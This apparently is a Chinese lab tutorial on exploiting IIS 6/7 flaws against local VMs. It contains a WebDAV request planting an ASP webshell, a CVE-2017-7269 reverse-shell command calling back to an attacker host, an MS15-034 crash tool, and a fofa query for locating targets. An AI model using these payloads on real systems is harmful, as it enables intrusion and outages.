当前位置: 首页 > news >正文

中间件框架漏洞攻略

中间件(英语:Middleware)是提供系统软件和应⽤软件之间连接的软件,以便于软件各部件之间的沟通。    

 中间件处在操作系统和更⾼⼀级应⽤程序之间。他充当的功能是:将应⽤程序运⾏环境与操作系统隔离,从⽽实现应⽤程序开发者不必为更多系统问题忧虑,⽽直接关注该应⽤程序在解决问题上的能⼒ 。容器就是中间件的⼀种。

也就是说,关于中间件,我们可以理解为:是⼀类能够为⼀种或多种应⽤程序合作互通、资源共享,同时还能够为该应⽤程序提供相关的服务的软件。(注意:中间件是⼀类软件的总称,不是单独的⼀个软件)。

IIS(IIS6.x)

PUT漏洞

IIS Server 在 Web 服务扩展中开启了 WebDAV ,配置了可以写⼊的权限,造成任意⽂件上传。

环境

fofa:"IIS-6.0"

本地搭建2003 server

开启 WebDAV 和写权限

打开网址,直接抓包 

 发送重放器,修改代码

MOVE /1.txt HTTP/1.1
Host:192.168.80.132
Destination:http://192.168.80.132/shell.asp
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Length: 25

<%eval request("cmd")%>

发送后生成shell.jsp 

 可以使用http://192.168.80.132/shell.asp访问

使用菜⼑,蚁剑连接即可

IIS短⽂件漏洞

开启IIS6.0 ASP.NET

Windows 以 8.3 格式⽣成与 MS-DOS 兼容的(短)⽂件名,以允许基于 MS-DOS 或 16位 Windows的程序访问这些⽂件。在cmd下输⼊"dir /x"即可看到短⽂件名的效果

 

创建1223213113.txt 

 

访问:http://upload.moonteam.com/*~1*/a.asp   开始尝试

之后一位一位试就可以了 ,出现无法找到该页,为正确

尝试后缀名

​​ 之后一位一位试就可以了 ,出现无法找到该页,为正确

IIS RCE-CVE-2017-7269

Microsoft windows Server 2003 R2中的 Interne信息服务IIS6.0中的 WebDAV服务中的 ScStoragePathFromUrl函数中的缓冲区溢出允许远程攻击者通过以 If:<http:// 开头的⻓标头执⾏任意代码 PROPFIND请求

WiNdows Server 2003 R2上使⽤IIS6.0并开启 WebDAV扩展。

利⽤⼯具

https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269

 反弹shell

将工具放到kali

python2 '/home/kali/Desktop/iis6 reverse shell' 192.168.80.132 80 192.168.80.129 6666

IIS   (llS7.x)

HTTP.SYS远程代码执⾏(MS15-034)  MS-->Microsoft 2015 -034

HTTP SYS是Microsoft Windows处理HTTP请求的内核驱动程序,为了优化IIS服务器性能,从IIS6.0引 ⼊,IIS服务进程依赖HTTP.SY

HTTP.SYS远程代码执⾏漏洞实质是HTTP.SYS的整数溢出漏洞,当攻击者向受影响的 Windows系统发送 特殊设计的HTTP 请求,HTTP.sys 未正确分析时就会导致此漏洞,成功利⽤此漏洞的攻击者可以在系统 帐户的上下⽂中执⾏任意代码。

主要存在Windows+IIS的环境下,任何安装了微软IIS 6.0以上的Windows Server 2008 R2/Server 2012/Server 2012 R2以及Windows 7/8/8.1操作系统都受到这个漏洞的影响验证这个漏洞。

环境

windows server 2012 IIS8.5

在主页面右击,点击复制图片链接(后面用)

 使用工具

下载: https://github.com/davidjura/MS15-034-IIS-Active-DoS-Exploit-PoC

 python IISDoS.py  

 返回window后出现蓝屏

 

相关文章:

  • 室分覆盖(室内分布系统)详解
  • 二叉搜索树的最近公共祖先 删除二叉搜索树中的节点 修剪二叉搜索树(Java)
  • ClickHouse怎么学习
  • 数据库—sql语法基础
  • 健身房管理系统(源码+数据库)
  • 《HarmonyOS Next自定义TabBar页签凸起和凹陷案例与代码》
  • chatshare.xyz和chatshare.biz的差别和渠道!
  • 【踩坑日记】IDEA的ctrl+r快捷键冲突无法使用
  • 前端如何用canvas来做电影院选票功能
  • K8S学习之基础四十七:k8s中部署fluentd
  • Java多线程与高并发专题——如何利用 CompletableFuture 解决“聚合打车服务平台”的问题?
  • 2.4 隐函数及由参数方程确定的函数求导
  • C#中值类型与引用类型是直观使用示例
  • __init__.py
  • openGauss关联列数据类型不一致引起谓词传递失败
  • fuse性能关键参数entry_timeout
  • python面试高频考点(深度学习大模型方向)
  • V8引擎源码编译踩坑实录
  • 如何在 Vue 项目中使用v - show和v - if指令,它们的原理、区别和适用场景是什么
  • jangow-01-1.0.1靶机攻略
  • 美国通过《删除法案》:打击未经同意发布他人私密图像,包括“深度伪造”
  • 泽连斯基承认乌情报部门刺杀俄军高官
  • 湖南华容县通报“大垱湖水质受污染”,爆料者:现场已在灌清水
  • 大理杨徐邱再审上诉案宣判:驳回上诉,维持再审一审判决
  • 北京公园使用指南
  • 坚守刑事检察一线13年,“在我心中每次庭审都是一次大考”